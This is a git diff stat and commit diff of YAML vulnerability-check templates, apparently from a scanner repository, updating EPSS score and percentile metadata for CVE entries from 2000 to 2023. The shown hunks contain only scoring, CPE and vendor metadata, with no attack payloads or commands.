http/cves/2022/CVE-2022-26564.yaml | 1 +
http/cves/2022/CVE-2022-26833.yaml | 3 +-
http/cves/2022/CVE-2022-26960.yaml | 1 +
http/cves/2022/CVE-2022-2733.yaml | 3 +-
http/cves/2022/CVE-2022-2756.yaml | 3 +-
http/cves/2022/CVE-2022-27593.yaml | 3 +-
http/cves/2022/CVE-2022-27849.yaml | 1 +
http/cves/2022/CVE-2022-27926.yaml | 3 +-
http/cves/2022/CVE-2022-27927.yaml | 1 +
http/cves/2022/CVE-2022-27984.yaml | 4 +-
http/cves/2022/CVE-2022-27985.yaml | 3 +-
http/cves/2022/CVE-2022-28022.yaml | 1 +
http/cves/2022/CVE-2022-28023.yaml | 1 +
http/cves/2022/CVE-2022-28032.yaml | 1 +
http/cves/2022/CVE-2022-28079.yaml | 1 +
http/cves/2022/CVE-2022-28080.yaml | 1 +
http/cves/2022/CVE-2022-28117.yaml | 3 +-
http/cves/2022/CVE-2022-28219.yaml | 1 +
http/cves/2022/CVE-2022-28290.yaml | 1 +
http/cves/2022/CVE-2022-28363.yaml | 3 +-
http/cves/2022/CVE-2022-28365.yaml | 5 +-
http/cves/2022/CVE-2022-2863.yaml | 3 +-
http/cves/2022/CVE-2022-28923.yaml | 3 +-
http/cves/2022/CVE-2022-28955.yaml | 3 +-
http/cves/2022/CVE-2022-29004.yaml | 1 +
http/cves/2022/CVE-2022-29005.yaml | 2 +-
http/cves/2022/CVE-2022-29006.yaml | 1 +
http/cves/2022/CVE-2022-29007.yaml | 1 +
http/cves/2022/CVE-2022-29009.yaml | 1 +
http/cves/2022/CVE-2022-29014.yaml | 1 +
http/cves/2022/CVE-2022-29078.yaml | 5 +-
http/cves/2022/CVE-2022-29153.yaml | 3 +-
http/cves/2022/CVE-2022-29272.yaml | 3 +-
http/cves/2022/CVE-2022-29298.yaml | 3 +-
http/cves/2022/CVE-2022-29303.yaml | 5 +-
http/cves/2022/CVE-2022-29349.yaml | 3 +-
http/cves/2022/CVE-2022-29383.yaml | 3 +-
http/cves/2022/CVE-2022-29455.yaml | 3 +-
http/cves/2022/CVE-2022-29464.yaml | 5 +-
http/cves/2022/CVE-2022-29548.yaml | 1 +
http/cves/2022/CVE-2022-29775.yaml | 3 +-
http/cves/2022/CVE-2022-30073.yaml | 1 +
http/cves/2022/CVE-2022-30489.yaml | 1 +
http/cves/2022/CVE-2022-30512.yaml | 3 +-
http/cves/2022/CVE-2022-30513.yaml | 1 +
http/cves/2022/CVE-2022-30514.yaml | 1 +
http/cves/2022/CVE-2022-30525.yaml | 3 +-
http/cves/2022/CVE-2022-3062.yaml | 3 +-
http/cves/2022/CVE-2022-30776.yaml | 1 +
http/cves/2022/CVE-2022-30777.yaml | 1 +
http/cves/2022/CVE-2022-31126.yaml | 3 +-
http/cves/2022/CVE-2022-31268.yaml | 3 +-
http/cves/2022/CVE-2022-31269.yaml | 3 +-
http/cves/2022/CVE-2022-31299.yaml | 3 +-
http/cves/2022/CVE-2022-31373.yaml | 3 +-
http/cves/2022/CVE-2022-31474.yaml | 3 +-
http/cves/2022/CVE-2022-31499.yaml | 3 +-
http/cves/2022/CVE-2022-31656.yaml | 3 +-
http/cves/2022/CVE-2022-31798.yaml | 5 +-
http/cves/2022/CVE-2022-31814.yaml | 4 +-
http/cves/2022/CVE-2022-31845.yaml | 3 +-
http/cves/2022/CVE-2022-31846.yaml | 3 +-
http/cves/2022/CVE-2022-31847.yaml | 5 +-
http/cves/2022/CVE-2022-31854.yaml | 3 +-
http/cves/2022/CVE-2022-31879.yaml | 4 +-
http/cves/2022/CVE-2022-31974.yaml | 3 +-
http/cves/2022/CVE-2022-31975.yaml | 3 +-
http/cves/2022/CVE-2022-31976.yaml | 3 +-
http/cves/2022/CVE-2022-31977.yaml | 3 +-
http/cves/2022/CVE-2022-31978.yaml | 3 +-
http/cves/2022/CVE-2022-31980.yaml | 3 +-
http/cves/2022/CVE-2022-31981.yaml | 3 +-
http/cves/2022/CVE-2022-31982.yaml | 3 +-
http/cves/2022/CVE-2022-31983.yaml | 3 +-
http/cves/2022/CVE-2022-31984.yaml | 3 +-
http/cves/2022/CVE-2022-32007.yaml | 3 +-
http/cves/2022/CVE-2022-32015.yaml | 3 +-
http/cves/2022/CVE-2022-32018.yaml | 3 +-
http/cves/2022/CVE-2022-32022.yaml | 3 +-
http/cves/2022/CVE-2022-32024.yaml | 3 +-
http/cves/2022/CVE-2022-32025.yaml | 3 +-
http/cves/2022/CVE-2022-32026.yaml | 3 +-
http/cves/2022/CVE-2022-32028.yaml | 3 +-
http/cves/2022/CVE-2022-32094.yaml | 3 +-
http/cves/2022/CVE-2022-32195.yaml | 1 +
http/cves/2022/CVE-2022-32409.yaml | 5 +-
http/cves/2022/CVE-2022-32429.yaml | 3 +-
http/cves/2022/CVE-2022-32444.yaml | 3 +-
http/cves/2022/CVE-2022-32770.yaml | 3 +-
http/cves/2022/CVE-2022-32771.yaml | 3 +-
http/cves/2022/CVE-2022-32772.yaml | 3 +-
http/cves/2022/CVE-2022-33119.yaml | 3 +-
http/cves/2022/CVE-2022-33174.yaml | 3 +-
http/cves/2022/CVE-2022-33891.yaml | 5 +-
http/cves/2022/CVE-2022-33901.yaml | 3 +-
http/cves/2022/CVE-2022-33965.yaml | 3 +-
http/cves/2022/CVE-2022-34045.yaml | 3 +-
http/cves/2022/CVE-2022-34046.yaml | 3 +-
http/cves/2022/CVE-2022-34047.yaml | 3 +-
http/cves/2022/CVE-2022-34048.yaml | 3 +-
http/cves/2022/CVE-2022-34049.yaml | 3 +-
http/cves/2022/CVE-2022-34121.yaml | 3 +-
http/cves/2022/CVE-2022-34328.yaml | 3 +-
http/cves/2022/CVE-2022-34576.yaml | 3 +-
http/cves/2022/CVE-2022-34590.yaml | 3 +-
http/cves/2022/CVE-2022-34753.yaml | 3 +-
http/cves/2022/CVE-2022-3484.yaml | 1 +
http/cves/2022/CVE-2022-3506.yaml | 1 +
http/cves/2022/CVE-2022-35151.yaml | 3 +-
http/cves/2022/CVE-2022-35405.yaml | 4 +-
http/cves/2022/CVE-2022-35413.yaml | 3 +-
http/cves/2022/CVE-2022-35416.yaml | 3 +-
http/cves/2022/CVE-2022-35493.yaml | 3 +-
http/cves/2022/CVE-2022-3578.yaml | 1 +
http/cves/2022/CVE-2022-35914.yaml | 3 +-
http/cves/2022/CVE-2022-36446.yaml | 3 +-
http/cves/2022/CVE-2022-36537.yaml | 3 +-
http/cves/2022/CVE-2022-36642.yaml | 3 +-
http/cves/2022/CVE-2022-36804.yaml | 7 +-
http/cves/2022/CVE-2022-36883.yaml | 3 +-
http/cves/2022/CVE-2022-37042.yaml | 5 +-
http/cves/2022/CVE-2022-37153.yaml | 1 +
http/cves/2022/CVE-2022-37190.yaml | 3 +-
http/cves/2022/CVE-2022-37191.yaml | 3 +-
http/cves/2022/CVE-2022-37299.yaml | 3 +-
http/cves/2022/CVE-2022-3768.yaml | 3 +-
http/cves/2022/CVE-2022-3800.yaml | 3 +-
http/cves/2022/CVE-2022-38295.yaml | 3 +-
http/cves/2022/CVE-2022-38296.yaml | 3 +-
http/cves/2022/CVE-2022-38463.yaml | 3 +-
http/cves/2022/CVE-2022-38467.yaml | 1 +
http/cves/2022/CVE-2022-38553.yaml | 3 +-
http/cves/2022/CVE-2022-38637.yaml | 3 +-
http/cves/2022/CVE-2022-38794.yaml | 3 +-
http/cves/2022/CVE-2022-38817.yaml | 4 +-
http/cves/2022/CVE-2022-38870.yaml | 3 +-
http/cves/2022/CVE-2022-3908.yaml | 3 +-
http/cves/2022/CVE-2022-39195.yaml | 1 +
http/cves/2022/CVE-2022-3933.yaml | 3 +-
http/cves/2022/CVE-2022-3934.yaml | 3 +-
http/cves/2022/CVE-2022-3980.yaml | 3 +-
http/cves/2022/CVE-2022-3982.yaml | 3 +-
http/cves/2022/CVE-2022-39952.yaml | 5 +-
http/cves/2022/CVE-2022-39960.yaml | 3 +-
http/cves/2022/CVE-2022-39986.yaml | 9 +-
http/cves/2022/CVE-2022-40022.yaml | 3 +-
http/cves/2022/CVE-2022-40083.yaml | 3 +-
http/cves/2022/CVE-2022-40127.yaml | 3 +-
http/cves/2022/CVE-2022-40359.yaml | 3 +-
http/cves/2022/CVE-2022-4050.yaml | 3 +-
http/cves/2022/CVE-2022-4057.yaml | 3 +-
http/cves/2022/CVE-2022-4060.yaml | 1 +
http/cves/2022/CVE-2022-4063.yaml | 3 +-
http/cves/2022/CVE-2022-40684.yaml | 5 +-
http/cves/2022/CVE-2022-40734.yaml | 3 +-
http/cves/2022/CVE-2022-40843.yaml | 11 +-
http/cves/2022/CVE-2022-40879.yaml | 3 +-
http/cves/2022/CVE-2022-40881.yaml | 3 +-
http/cves/2022/CVE-2022-4117.yaml | 3 +-
http/cves/2022/CVE-2022-4140.yaml | 3 +-
http/cves/2022/CVE-2022-41441.yaml | 3 +-
http/cves/2022/CVE-2022-41473.yaml | 3 +-
http/cves/2022/CVE-2022-41840.yaml | 3 +-
http/cves/2022/CVE-2022-42094.yaml | 1 +
http/cves/2022/CVE-2022-42095.yaml | 1 +
http/cves/2022/CVE-2022-42096.yaml | 1 +
http/cves/2022/CVE-2022-42233.yaml | 3 +-
http/cves/2022/CVE-2022-4260.yaml | 3 +-
http/cves/2022/CVE-2022-42746.yaml | 1 +
http/cves/2022/CVE-2022-42747.yaml | 1 +
http/cves/2022/CVE-2022-42748.yaml | 1 +
http/cves/2022/CVE-2022-42749.yaml | 1 +
http/cves/2022/CVE-2022-4295.yaml | 1 +
http/cves/2022/CVE-2022-4301.yaml | 3 +-
http/cves/2022/CVE-2022-43014.yaml | 1 +
http/cves/2022/CVE-2022-43015.yaml | 1 +
http/cves/2022/CVE-2022-43016.yaml | 1 +
http/cves/2022/CVE-2022-43017.yaml | 1 +
http/cves/2022/CVE-2022-43018.yaml | 1 +
http/cves/2022/CVE-2022-4306.yaml | 1 +
http/cves/2022/CVE-2022-43140.yaml | 3 +-
http/cves/2022/CVE-2022-43164.yaml | 3 +-
http/cves/2022/CVE-2022-43165.yaml | 3 +-
http/cves/2022/CVE-2022-43166.yaml | 3 +-
http/cves/2022/CVE-2022-43167.yaml | 3 +-
http/cves/2022/CVE-2022-43169.yaml | 3 +-
http/cves/2022/CVE-2022-43170.yaml | 3 +-
http/cves/2022/CVE-2022-43185.yaml | 3 +-
http/cves/2022/CVE-2022-4320.yaml | 1 +
http/cves/2022/CVE-2022-4321.yaml | 1 +
http/cves/2022/CVE-2022-4325.yaml | 3 +-
http/cves/2022/CVE-2022-4328.yaml | 1 +
http/cves/2022/CVE-2022-43769.yaml | 3 +-
http/cves/2022/CVE-2022-4447.yaml | 3 +-
http/cves/2022/CVE-2022-44877.yaml | 3 +-
http/cves/2022/CVE-2022-44944.yaml | 3 +-
http/cves/2022/CVE-2022-44946.yaml | 3 +-
http/cves/2022/CVE-2022-44947.yaml | 3 +-
http/cves/2022/CVE-2022-44948.yaml | 3 +-
http/cves/2022/CVE-2022-44949.yaml | 3 +-
http/cves/2022/CVE-2022-44950.yaml | 3 +-
http/cves/2022/CVE-2022-44951.yaml | 3 +-
http/cves/2022/CVE-2022-44952.yaml | 3 +-
http/cves/2022/CVE-2022-45037.yaml | 1 +
http/cves/2022/CVE-2022-45038.yaml | 1 +
http/cves/2022/CVE-2022-45805.yaml | 5 +-
http/cves/2022/CVE-2022-45835.yaml | 4 +-
http/cves/2022/CVE-2022-45917.yaml | 1 +
http/cves/2022/CVE-2022-45933.yaml | 5 +-
http/cves/2022/CVE-2022-46020.yaml | 3 +-
http/cves/2022/CVE-2022-46071.yaml | 3 +-
http/cves/2022/CVE-2022-46073.yaml | 3 +-
http/cves/2022/CVE-2022-46169.yaml | 3 +-
http/cves/2022/CVE-2022-46381.yaml | 3 +-
http/cves/2022/CVE-2022-46443.yaml | 8 +-
http/cves/2022/CVE-2022-46463.yaml | 9 ++
http/cves/2022/CVE-2022-46888.yaml | 1 +
http/cves/2022/CVE-2022-46934.yaml | 1 +
http/cves/2022/CVE-2022-47002.yaml | 3 +-
http/cves/2022/CVE-2022-47003.yaml | 3 +-
http/cves/2022/CVE-2022-47615.yaml | 9 +-
http/cves/2022/CVE-2022-47945.yaml | 2 +
http/cves/2022/CVE-2022-47966.yaml | 3 +-
http/cves/2022/CVE-2022-47986.yaml | 3 +-
http/cves/2022/CVE-2022-48012.yaml | 1 +
http/cves/2022/CVE-2022-48165.yaml | 3 +-
http/cves/2022/CVE-2022-4897.yaml | 1 +
http/cves/2023/CVE-2023-0099.yaml | 1 +
http/cves/2023/CVE-2023-0126.yaml | 3 +-
http/cves/2023/CVE-2023-0236.yaml | 1 +
http/cves/2023/CVE-2023-0261.yaml | 3 +-
http/cves/2023/CVE-2023-0297.yaml | 3 +-
http/cves/2023/CVE-2023-0448.yaml | 11 +-
http/cves/2023/CVE-2023-0514.yaml | 1 +
http/cves/2023/CVE-2023-0527.yaml | 3 +-
http/cves/2023/CVE-2023-0552.yaml | 1 +
http/cves/2023/CVE-2023-0562.yaml | 3 +-
http/cves/2023/CVE-2023-0563.yaml | 3 +-
http/cves/2023/CVE-2023-0630.yaml | 1 +
http/cves/2023/CVE-2023-0669.yaml | 3 +-
http/cves/2023/CVE-2023-0942.yaml | 3 +-
http/cves/2023/CVE-2023-0948.yaml | 1 +
http/cves/2023/CVE-2023-0968.yaml | 3 +-
http/cves/2023/CVE-2023-1020.yaml | 3 +-
http/cves/2023/CVE-2023-1080.yaml | 3 +-
http/cves/2023/CVE-2023-1177.yaml | 3 +-
http/cves/2023/CVE-2023-1362.yaml | 1 +
http/cves/2023/CVE-2023-1454.yaml | 1 +
http/cves/2023/CVE-2023-1496.yaml | 1 +
http/cves/2023/CVE-2023-1546.yaml | 12 +-
http/cves/2023/CVE-2023-1671.yaml | 3 +-
http/cves/2023/CVE-2023-1698.yaml | 8 +-
http/cves/2023/CVE-2023-1730.yaml | 3 +-
http/cves/2023/CVE-2023-1835.yaml | 3 +-
http/cves/2023/CVE-2023-1890.yaml | 3 +-
http/cves/2023/CVE-2023-20073.yaml | 7 +-
http/cves/2023/CVE-2023-2023.yaml | 7 +-
http/cves/2023/CVE-2023-20864.yaml | 3 +-
http/cves/2023/CVE-2023-20887.yaml | 4 +-
http/cves/2023/CVE-2023-20888.yaml | 1 +
http/cves/2023/CVE-2023-20889.yaml | 3 +-
http/cves/2023/CVE-2023-2122.yaml | 6 +
http/cves/2023/CVE-2023-2130.yaml | 3 +-
http/cves/2023/CVE-2023-2178.yaml | 12 +-
http/cves/2023/CVE-2023-22478.yaml | 8 ++
http/cves/2023/CVE-2023-22480.yaml | 11 +-
http/cves/2023/CVE-2023-22620.yaml | 3 +-
http/cves/2023/CVE-2023-2272.yaml | 6 +
http/cves/2023/CVE-2023-22897.yaml | 3 +-
http/cves/2023/CVE-2023-23161.yaml | 6 +-
http/cves/2023/CVE-2023-23333.yaml | 3 +-
http/cves/2023/CVE-2023-23488.yaml | 3 +-
http/cves/2023/CVE-2023-23489.yaml | 3 +-
http/cves/2023/CVE-2023-23491.yaml | 11 +-
http/cves/2023/CVE-2023-23492.yaml | 3 +-
http/cves/2023/CVE-2023-2356.yaml | 3 +-
http/cves/2023/CVE-2023-23752.yaml | 3 +-
http/cves/2023/CVE-2023-24044.yaml | 3 +-
http/cves/2023/CVE-2023-24243.yaml | 1 +
http/cves/2023/CVE-2023-24278.yaml | 1 +
http/cves/2023/CVE-2023-24322.yaml | 1 +
http/cves/2023/CVE-2023-24488.yaml | 3 +-
http/cves/2023/CVE-2023-24489.yaml | 12 +-
http/cves/2023/CVE-2023-24657.yaml | 1 +
http/cves/2023/CVE-2023-24733.yaml | 1 +
http/cves/2023/CVE-2023-24735.yaml | 3 +-
http/cves/2023/CVE-2023-24737.yaml | 1 +
http/cves/2023/CVE-2023-25135.yaml | 3 +-
http/cves/2023/CVE-2023-25157.yaml | 3 +-
http/cves/2023/CVE-2023-25346.yaml | 1 +
http/cves/2023/CVE-2023-25717.yaml | 3 +-
http/cves/2023/CVE-2023-26067.yaml | 7 +-
http/cves/2023/CVE-2023-26255.yaml | 3 +-
http/cves/2023/CVE-2023-26256.yaml | 3 +-
http/cves/2023/CVE-2023-26360.yaml | 3 +-
http/cves/2023/CVE-2023-26469.yaml | 11 +-
http/cves/2023/CVE-2023-26842.yaml | 1 +
http/cves/2023/CVE-2023-26843.yaml | 1 +
http/cves/2023/CVE-2023-27008.yaml | 1 +
http/cves/2023/CVE-2023-27034.yaml | 12 +-
http/cves/2023/CVE-2023-27159.yaml | 3 +-
http/cves/2023/CVE-2023-27179.yaml | 3 +-
http/cves/2023/CVE-2023-27292.yaml | 1 +
http/cves/2023/CVE-2023-2732.yaml | 1 +
http/cves/2023/CVE-2023-27350.yaml | 3 +-
http/cves/2023/CVE-2023-27372.yaml | 3 +-
http/cves/2023/CVE-2023-27482.yaml | 1 +
http/cves/2023/CVE-2023-27524.yaml | 3 +-
http/cves/2023/CVE-2023-27587.yaml | 3 +-
http/cves/2023/CVE-2023-2780.yaml | 3 +-
http/cves/2023/CVE-2023-2796.yaml | 4 +-
http/cves/2023/CVE-2023-28121.yaml | 3 +-
http/cves/2023/CVE-2023-2822.yaml | 3 +-
http/cves/2023/CVE-2023-2825.yaml | 1 +
http/cves/2023/CVE-2023-28343.yaml | 3 +-
http/cves/2023/CVE-2023-28432.yaml | 3 +-
http/cves/2023/CVE-2023-28665.yaml | 12 +-
http/cves/2023/CVE-2023-29084.yaml | 3 +-
http/cves/2023/CVE-2023-29298.yaml | 9 +-
http/cves/2023/CVE-2023-29300.yaml | 4 +-
http/cves/2023/CVE-2023-29489.yaml | 3 +-
http/cves/2023/CVE-2023-29622.yaml | 3 +-
http/cves/2023/CVE-2023-29623.yaml | 1 +
http/cves/2023/CVE-2023-2982.yaml | 3 +-
http/cves/2023/CVE-2023-29887.yaml | 1 +
http/cves/2023/CVE-2023-29919.yaml | 3 +-
http/cves/2023/CVE-2023-29922.yaml | 3 +-
http/cves/2023/CVE-2023-29923.yaml | 1 +
http/cves/2023/CVE-2023-30019.yaml | 3 +-
http/cves/2023/CVE-2023-30150.yaml | 9 +-
http/cves/2023/CVE-2023-30210.yaml | 1 +
http/cves/2023/CVE-2023-30212.yaml | 1 +
http/cves/2023/CVE-2023-30256.yaml | 3 +-
http/cves/2023/CVE-2023-30777.yaml | 1 +
http/cves/2023/CVE-2023-31059.yaml | 3 +-
http/cves/2023/CVE-2023-31548.yaml | 1 +
http/cves/2023/CVE-2023-32117.yaml | 2 +-
http/cves/2023/CVE-2023-32235.yaml | 1 +
http/cves/2023/CVE-2023-32243.yaml | 13 ++-
http/cves/2023/CVE-2023-32315.yaml | 5 +-
http/cves/2023/CVE-2023-32563.yaml | 4 +-
http/cves/2023/CVE-2023-33338.yaml | 3 +-
http/cves/2023/CVE-2023-33439.yaml | 3 +-
http/cves/2023/CVE-2023-33440.yaml | 3 +-
http/cves/2023/CVE-2023-3345.yaml | 11 +-
http/cves/2023/CVE-2023-33510.yaml | 3 +-
http/cves/2023/CVE-2023-33568.yaml | 1 +
http/cves/2023/CVE-2023-34124.yaml | 14 ++-
http/cves/2023/CVE-2023-34362.yaml | 5 +-
http/cves/2023/CVE-2023-34537.yaml | 1 +
http/cves/2023/CVE-2023-34598.yaml | 1 +
http/cves/2023/CVE-2023-34599.yaml | 3 +-
http/cves/2023/CVE-2023-3460.yaml | 4 +-
http/cves/2023/CVE-2023-34659.yaml | 3 +-
http/cves/2023/CVE-2023-3479.yaml | 3 +-
http/cves/2023/CVE-2023-34843.yaml | 1 +
http/cves/2023/CVE-2023-34960.yaml | 15 ++-
http/cves/2023/CVE-2023-35078.yaml | 10 +-
http/cves/2023/CVE-2023-35082.yaml | 12 +-
http/cves/2023/CVE-2023-35843.yaml | 1 +
http/cves/2023/CVE-2023-35844.yaml | 1 +
http/cves/2023/CVE-2023-35885.yaml | 4 +-
http/cves/2023/CVE-2023-36287.yaml | 3 +-
http/cves/2023/CVE-2023-36289.yaml | 3 +-
http/cves/2023/CVE-2023-36346.yaml | 1 +
http/cves/2023/CVE-2023-36844.yaml | 11 +-
http/cves/2023/CVE-2023-36934.yaml | 3 +-
http/cves/2023/CVE-2023-37265.yaml | 12 +-
http/cves/2023/CVE-2023-37266.yaml | 11 +-
http/cves/2023/CVE-2023-37270.yaml | 14 ++-
http/cves/2023/CVE-2023-37462.yaml | 17 ++-
http/cves/2023/CVE-2023-37580.yaml | 14 ++-
http/cves/2023/CVE-2023-3765.yaml | 10 +-
http/cves/2023/CVE-2023-38035.yaml | 10 +-
http/cves/2023/CVE-2023-38205.yaml | 4 +-
http/cves/2023/CVE-2023-3836.yaml | 14 ++-
http/cves/2023/CVE-2023-38646.yaml | 15 ++-
http/cves/2023/CVE-2023-39026.yaml | 9 ++
http/cves/2023/CVE-2023-39141.yaml | 10 ++
http/cves/2023/CVE-2023-39143.yaml | 11 +-
http/cves/2023/CVE-2023-3936.yaml | 13 ++-
http/cves/2023/CVE-2023-4173.yaml | 18 ++-
http/cves/2023/CVE-2023-4174.yaml | 17 ++-
1999 files changed, 3745 insertions(+), 1399 deletions(-)
diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml
index 0f50435ab9..066c77444f 100644
--- a/http/cves/2000/CVE-2000-0114.yaml
+++ b/http/cves/2000/CVE-2000-0114.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: NVD-CWE-Other
epss-score: 0.09258
cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.93895
metadata:
max-request: 1
vendor: microsoft
diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml
index c0c83df526..47e397a19a 100644
--- a/http/cves/2001/CVE-2001-0537.yaml
+++ b/http/cves/2001/CVE-2001-0537.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.3
cve-id: CVE-2001-0537
cwe-id: CWE-287
- epss-score: 0.89071
+ epss-score: 0.88063
cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*
+ epss-percentile: 0.9824
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml
index 8243b9f833..cfbaf5b880 100644
--- a/http/cves/2002/CVE-2002-1131.yaml
+++ b/http/cves/2002/CVE-2002-1131.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-80
epss-score: 0.06018
cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9253
metadata:
max-request: 5
vendor: squirrelmail
diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml
index 1de7475149..40143f9958 100644
--- a/http/cves/2004/CVE-2004-0519.yaml
+++ b/http/cves/2004/CVE-2004-0519.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: NVD-CWE-Other
epss-score: 0.02285
cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.88244
metadata:
max-request: 1
vendor: sgi
diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml
index 8236b3fc1f..749de068b3 100644
--- a/http/cves/2004/CVE-2004-1965.yaml
+++ b/http/cves/2004/CVE-2004-1965.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: NVD-CWE-Other
epss-score: 0.0113
cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:*
+ epss-percentile: 0.82864
metadata:
max-request: 1
vendor: openbb
diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml
index d3011ef96d..fc6dc4b670 100644
--- a/http/cves/2005/CVE-2005-2428.yaml
+++ b/http/cves/2005/CVE-2005-2428.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-200
epss-score: 0.01188
cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.83354
metadata:
max-request: 1
vendor: ibm
diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml
index c2fbf2f55a..32e44d9bb5 100644
--- a/http/cves/2005/CVE-2005-3344.yaml
+++ b/http/cves/2005/CVE-2005-3344.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: NVD-CWE-Other
epss-score: 0.02158
cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:*
+ epss-percentile: 0.87895
metadata:
max-request: 2
vendor: horde
diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml
index 3be084b3d8..f97265581d 100644
--- a/http/cves/2005/CVE-2005-3634.yaml
+++ b/http/cves/2005/CVE-2005-3634.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: NVD-CWE-Other
epss-score: 0.02843
cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:*
+ epss-percentile: 0.89376
metadata:
max-request: 1
shodan-query: html:"SAP Business Server Pages Team"
diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml
index 53ef9e9d0e..8fb587280c 100644
--- a/http/cves/2005/CVE-2005-4385.yaml
+++ b/http/cves/2005/CVE-2005-4385.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: NVD-CWE-Other
epss-score: 0.00294
cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:*
+ epss-percentile: 0.65316
metadata:
max-request: 1
vendor: cofax
diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml
index 0cb4e34c71..55fd90bb63 100644
--- a/http/cves/2006/CVE-2006-1681.yaml
+++ b/http/cves/2006/CVE-2006-1681.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: NVD-CWE-Other
epss-score: 0.01015
cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.81872
metadata:
max-request: 1
vendor: cherokee
diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml
index df57a144c1..81e94fa41e 100644
--- a/http/cves/2006/CVE-2006-2842.yaml
+++ b/http/cves/2006/CVE-2006-2842.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.2925
cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96295
metadata:
max-request: 1
vendor: squirrelmail
diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml
index 646e83cddf..5e51fe4524 100644
--- a/http/cves/2007/CVE-2007-0885.yaml
+++ b/http/cves/2007/CVE-2007-0885.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.8
cve-id: CVE-2007-0885
cwe-id: NVD-CWE-Other
- epss-score: 0.00694
+ epss-score: 0.0059
cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:*
+ epss-percentile: 0.75518
metadata:
max-request: 1
vendor: rainbow_portal
diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml
index 55d094a781..336f8dae64 100644
--- a/http/cves/2007/CVE-2007-4504.yaml
+++ b/http/cves/2007/CVE-2007-4504.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01677
cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86094
metadata:
max-request: 1
vendor: joomla
diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml
index 277a1a6504..574d190962 100644
--- a/http/cves/2007/CVE-2007-4556.yaml
+++ b/http/cves/2007/CVE-2007-4556.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: NVD-CWE-Other
epss-score: 0.14147
cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94981
metadata:
max-request: 1
vendor: opensymphony
diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml
index 5c55600307..f6dfc4146b 100644
--- a/http/cves/2007/CVE-2007-5728.yaml
+++ b/http/cves/2007/CVE-2007-5728.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2007-5728
cwe-id: CWE-79
- epss-score: 0.03308
+ epss-score: 0.02361
cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:*
+ epss-percentile: 0.8841
metadata:
max-request: 1
shodan-query: http.title:"phpPgAdmin"
diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml
index c1db177cb9..9a00317853 100644
--- a/http/cves/2008/CVE-2008-1059.yaml
+++ b/http/cves/2008/CVE-2008-1059.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-94
epss-score: 0.01493
cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*
+ epss-percentile: 0.85218
metadata:
max-request: 1
vendor: wordpress
diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml
index 9778fb65f2..c7c880b9f0 100644
--- a/http/cves/2008/CVE-2008-1061.yaml
+++ b/http/cves/2008/CVE-2008-1061.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00938
cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*
